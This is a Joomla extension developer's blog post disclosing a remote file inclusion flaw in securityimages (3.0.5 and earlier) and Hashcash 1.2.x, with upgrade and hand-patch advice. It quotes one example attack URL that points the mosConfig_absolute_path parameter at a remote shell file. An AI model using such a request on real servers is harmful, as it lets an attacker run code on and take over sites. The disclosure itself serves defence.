Saturday, February 04, 2012
Demo Joomla! 1.5
Visit the Joomla! 1.5 demo site to see my extensions live running
Follow Me
Demo Joomla! 2.5
Visit the Joomla! 2.5 demo site to see my extensions live running
Support
Do not
submit a bug report
if you need technical support or have questions.
Forums
Post your suggestions ask for help in the community forums
Wiki
Visit the Wiki extensive and up to date documentation at your fingertips.
Contact Me
Missing images/links, any comments, suggestions, need help? Contact me
Download
Skype
Need desperately help?
But dont abuse of it!
But dont abuse of it!
Security risk in securityimages
User Rating:
/ 0
 | The webmaster of janwiersma.com sent me an email today at 6:12AM , his server was hacked because of a bug in securityimages. This bug allows a remote atacker to execute commands via remote forceful include and execute function on your server and affect ALL version of securityimages <= 3.0.5 Here are all files which put your server at risk: client.php, configinsert.php, lang.php, server.php Example of attack: http://web/components/com_securityimages/ configinsert.php?mosConfig_absolute_path=http://shell.txt from http://securityreason.com/exploitalert/892 Secunia has also a report on it: http://secunia.com/product/11186/ |
| In fact I forget to use that line in these files: defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); This avoid any requests to access directly this file. - upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file) Please also contact all Your friends which are using securityimages! And for my other components? Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is avalaible! - upgrade to 1.2.2 (download at Joomla Forge or in my download sections) OR - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file) JoomlaCloud is NOT affected | |
YOU ARE ALL URGE TO UPGRADE ASAP!
You might also like:
255 days ago
Nasty Bug in SecurityImages 5.1.2
Thanks to Margus Pala, a security Flaw has been reported and corrected in SecurityImages version 5
913 days ago
HOW to make your own patches for securityimages
Just in case I take too much time to deliver a ready to use download, duration 5 minutes, but you ne
923 days ago
Joomla_1.5.13-Stable-Full_PackageForSecurityImages5.1.x_v01.
Only for SecurityImages 5.1.x and Joomla! 1.5.13 Allow login views, login modules, register, lost
945 days ago
Joomla_1.5.12-Stable-Full_PackageForSecurityImages5.1.x_v01.
Only for SecurityImages 5.1.x and Joomla! 1.5.12 Allow login views, login modules, register, lost
Parent Category: Extensions
Category: SecurityImages
Created on Tuesday, 01 August 2006 19:58
Last Updated on Thursday, 17 August 2006 21:54
Published Date
Hits: 13960
Donations
Thank You for supporting my work
Latest Articles
-
Thanks to Ondřej Surý, maintainer for some Debian packages, you can have the latest PHP5 maintained by Debian ... ... -
Munin is a networked resource monitoring tool that can help analyze resource trends and "what just happened to ki... ...
-
The General Robotics, Automation, Sensing and Perception (GRASP) Lab, located at the University of Pennsylvania, is al... ... -
There is a lot of shareware and freeware (jEdit, Notepad++) to do complex search and replacement in files but none is su... ... -
Data URI scheme is a URI scheme that provides a way to include data in line in web pages as if they were external reso... ...
Latest Comments
Popular Posts
-
HowTo transform your xBox into a Media Center with XBMCXboxMediaCenter is a free open source (GPL) multimedia player for... -
SORRY - 404 File Not Found Error The page you were looking for appears to have been moved, deleted or does not exis... -
African Porcupine against a bull terrier, the bull terrier was not smart enough to stop, and guess how it now look li... -
Add a led to your Xbox to see hard disk activity This mod is quite risky, especially if youcan not solder with precis...
Help Us & Leave Feedback!
- Do you have an excellent article idea you would like to read about here? Share it!
- Do you have some interesting tips how we could improve our site?
- Something missing here? Help us make this blog a better place, leave feedback!
We would love to hear from you!
Be active! Write us now!
Blogs
Didier Beck
Tech Head Brothers
google+ badge
Recommended Sites
Recommended Software
Joomla! Web Security
I recommend you to read Joomla! Web Security Secure your Joomla! website from common security threats with this easy-to-use guide
Learning Joomla! 1.5
Learning Joomla! 1.5 Extension Development: Creating Modules, Components, and Plugins with PHP
Devel. Cookbook
And also Joomla! 1.5 Development Cookbook if you want to start development (over 130 simple but incredibly useful recipes)
Back to Top
Copyright
Privacy Statement | Copyright Notice | Licenses
1999-2011 Cedric Walter - All Rights Reserved